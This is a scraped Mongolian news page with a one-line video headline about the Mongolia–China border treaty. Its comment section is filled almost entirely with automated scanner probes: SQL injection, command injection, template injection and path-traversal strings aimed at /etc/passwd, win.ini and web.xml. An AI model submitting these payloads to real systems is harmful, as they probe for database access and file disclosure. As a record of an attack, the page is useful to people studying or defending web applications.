Монгол Улс, БНХАУ-тай хилийн гэрээ байгуулснаас хойш хилийн маргаан гараагүй

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-15 12:46:29
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 104 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',9)='w
 • admin 185.234.72.114 104 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e
 • admin 185.234.72.114 104 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('c',9)
 • admin 185.234.72.114 104 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('m',0)
 • admin 185.234.72.114 104 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:9
 • admin 185.234.72.114 104 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 104 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/
 • admin 185.234.72.114 104 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 104 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0
 • admin 185.234.72.114 104 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 104 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/
 • admin 185.234.72.114 104 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 104 өдөр

  123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="
 • admin 185.234.72.114 104 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 104 өдөр

  123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='
 • admin 185.234.72.114 104 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 104 өдөр

  (select*from(select+sleep(9)union/**/select+1)a)
 • admin 185.234.72.114 104 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 104 өдөр

  123456"and"v"="m
 • admin 185.234.72.114 104 өдөр

  123456"and"m"="m
 • admin 185.234.72.114 104 өдөр

  123456'and'h'='o
 • admin 185.234.72.114 104 өдөр

  123456'and'p'='p
 • admin 185.234.72.114 104 өдөр

  123456/**/and+2=5
 • admin 185.234.72.114 104 өдөр

  123456/**/and+1=1
 • admin 185.234.72.114 104 өдөр

  123456'"\(
 • admin 185.234.72.114 104 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 104 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1491341539')))>'0
 • admin 185.234.72.114 104 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1182105879')))
 • admin 185.234.72.114 104 өдөр

  123456/**/and/**/cast(md5('1388371875')as/**/int)>0
 • admin 185.234.72.114 104 өдөр

  123456'and(select'1'from/**/cast(md5(1967347598)as/**/int))>'0
 • admin 185.234.72.114 104 өдөр

  extractvalue(1,concat(char(126),md5(1927303786)))
 • admin 185.234.72.114 104 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1202872178)))and"
 • admin 185.234.72.114 104 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1620530473)))and'
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',9)='c 185.234.72.114 104 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s 185.234.72.114 104 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:9 185.234.72.114 104 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 104 өдөр

  123456
 • expr 852962974 + 891912110 185.234.72.114 104 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(10))::text>'0 185.234.72.114 104 өдөр

  123456
 • admin&set /A 847476842+872225640 185.234.72.114 104 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(9))::text>'0 185.234.72.114 104 өдөр

  123456
 • admin$(expr 964455797 + 980267065) 185.234.72.114 104 өдөр

  123456
 • admin|expr 965559573 + 895849562 185.234.72.114 104 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 104 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 104 өдөр

  123456
 • admin expr 812420012 + 895549834 185.234.72.114 104 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  expr 844748730 + 877018006
 • admin 185.234.72.114 104 өдөр

  123456&set /A 929318883+905969840
 • <%- 867000534+975195775 %> 185.234.72.114 104 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 104 өдөр

  123456
 • admin'"\( 185.234.72.114 104 өдөр

  123456
 • admin'and(select*from(select+sleep(9))a/**/union/**/select+1)=' 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456$(expr 964350977 + 827454902)
 • #set($c=998256250+897902888)${c}$c 185.234.72.114 104 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 104 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 104 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 104 өдөр

  123456
 • '-var_dump(md5(919728967))-' 185.234.72.114 104 өдөр

  123456
 • ${(918234516+998659344)?c} 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1601289527')))>'0 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456|expr 813710115 + 898424525
 • ${@var_dump(md5(380398354))}; 185.234.72.114 104 өдөр

  123456
 • ${923650470+931587957} 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1057131230'))) 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456 expr 851204309 + 812024373
 • admin 185.234.72.114 104 өдөр

  '-var_dump(md5(123860790))-'
 • /*1*/{{812777046+968944815}} 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • admin/**/and/**/cast(md5('1229421796')as/**/int)>0 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  ${@var_dump(md5(887254237))};
 • admin 185.234.72.114 104 өдөр

  <%- 843495054+934962145 %>
 • admin"and"c"="e 185.234.72.114 104 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1632442607)as/**/int))>'0 185.234.72.114 104 өдөр

  123456
 • admin"and"i"="i 185.234.72.114 104 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1974649322))) 185.234.72.114 104 өдөр

  123456
 • jtuiahpalrkswkkxurcx 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  #set($c=961999921+906784873)${c}$c
 • admin"and/**/extractvalue(1,concat(char(126),md5(1727032590)))and" 185.234.72.114 104 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 104 өдөр

  123456
 • admin'and'd'='r 185.234.72.114 104 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1342798746)))and' 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  ${(987003540+807630951)?c}
 • admin 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  jtuiahpalrkswkkxurcx
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 104 өдөр

  123456
 • admin'and'n'='n 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • ${933369730+998213399} 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  ${843365272+850139365}
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  ${998079117+933920161}
 • admin 185.234.72.114 104 өдөр

  123456
 • admin 185.234.72.114 104 өдөр

  /*1*/{{919436440+862613249}}
 • admin 185.234.72.114 104 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',15)='v 194.163.191.42 105 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f 194.163.191.42 105 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:15 194.163.191.42 105 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 105 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(15))::text>'0 194.163.191.42 105 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 105 өдөр

  123456
 • admin"and(select*from(select+sleep(15))a/**/union/**/select+1)=" 194.163.191.42 105 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 105 өдөр

  123456
 • admin'and(select*from(select+sleep(15))a/**/union/**/select+1)=' 194.163.191.42 105 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 105 өдөр

  123456
 • admin"and"p"="t 194.163.191.42 105 өдөр

  123456
 • admin"and"h"="h 194.163.191.42 105 өдөр

  123456
 • admin'and'z'='u 194.163.191.42 105 өдөр

  123456
 • admin'and'r'='r 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',15)='v
 • admin 194.163.191.42 105 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',0)='k
 • admin 194.163.191.42 105 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('y',15)
 • admin 194.163.191.42 105 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('b',0)
 • admin 194.163.191.42 105 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:15
 • admin 194.163.191.42 105 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 105 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:15'/**/
 • admin 194.163.191.42 105 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 105 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(15))::text>'0
 • admin 194.163.191.42 105 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(15))>0/**/
 • ../../../../WEB-INF/web.xml 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456"and(select*from(select+sleep(15))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../WEB-INF/web.xml;admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and(select*from(select+sleep(15))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml 194.163.191.42 105 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../WEB-INF/web.xml 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  (select*from(select+sleep(15)union/**/select+1)a)
 • WEB-INF/web.xml;admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • WEB-INF/web.xml 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456"and"k"="f
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456"and"q"="q
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and'f'='b
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and'd'='d
 • ./../../../../../../Windows/win.ini 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456/**/and+0=7
 • ../../../../../../Windows/win.ini 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456/**/and+1=1
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 105 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 105 өдөр

  123456
 • admin'"\( 194.163.191.42 105 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 105 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 105 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1294889486')))>'0 194.163.191.42 105 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 105 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1599872057'))) 194.163.191.42 105 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 105 өдөр

  123456
 • admin/**/and/**/cast(md5('1806587713')as/**/int)>0 194.163.191.42 105 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 105 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1331221337)as/**/int))>'0 194.163.191.42 105 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 105 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1923763845))) 194.163.191.42 105 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 105 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1784323692)))and" 194.163.191.42 105 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1740550338)))and' 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'"\(
 • admin 194.163.191.42 105 өдөр

  123456鎈'"\(
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1885556568')))>'0
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1648608174')))
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456/**/and/**/cast(md5('1769062860')as/**/int)>0
 • %u2215etc%u2215passwd 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and(select'1'from/**/cast(md5(1486622770)as/**/int))>'0
 • %2fetc%2fpasswd 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  extractvalue(1,concat(char(126),md5(1400427743)))
 • /etc/passwdadmin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1531749813)))and"
 • /etc/passwd 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1120161703)))and'
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 105 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 105 өдөр

  123456
 • <%- 888557247+885471219 %> 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 105 өдөр

  123456
 • #set($c=930813717+826411119)${c}$c 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 105 өдөр

  123456
 • ${(982251854+859730744)?c} 194.163.191.42 105 өдөр

  123456
 • ${878079084+971307229} 194.163.191.42 105 өдөр

  123456
 • /*1*/{{823319834+945242351}} 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  <%- 802670733+800183968 %>
 • admin 194.163.191.42 105 өдөр

  #set($c=948135860+884943862)${c}$c
 • admin 194.163.191.42 105 өдөр

  ${(980507976+898316797)?c}
 • admin 194.163.191.42 105 өдөр

  ${912329765+860180909}
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456
 • expr 878889388 + 859335104 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  /*1*/{{966850075+885916516}}
 • admin&set /A 964823870+948161006 194.163.191.42 105 өдөр

  123456
 • '-var_dump(md5(943789688))-' 194.163.191.42 105 өдөр

  123456
 • admin$(expr 945922579 + 916058991) 194.163.191.42 105 өдөр

  123456
 • ${@var_dump(md5(963833125))}; 194.163.191.42 105 өдөр

  123456
 • admin|expr 900239673 + 932684890 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  ${826453824+991570364}
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456
 • admin expr 811244585 + 939688488 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  '-var_dump(md5(376251412))-'
 • admin 194.163.191.42 105 өдөр

  kgqmalpycimtznmoqmmr
 • admin 194.163.191.42 105 өдөр

  ${@var_dump(md5(768374253))};
 • admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  expr 842318987 + 926547002
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456&set /A 834427927+869147734
 • admin 194.163.191.42 105 өдөр

  123456$(expr 945311000 + 873940336)
 • admin 194.163.191.42 105 өдөр

  123456
 • kgqmalpycimtznmoqmmr 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456|expr 889092445 + 847168141
 • admin 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456
 • ${907534076+895577672} 194.163.191.42 105 өдөр

  123456
 • admin 194.163.191.42 105 өдөр

  123456 expr 871456755 + 967948161
 • admin 194.163.191.42 105 өдөр

  123456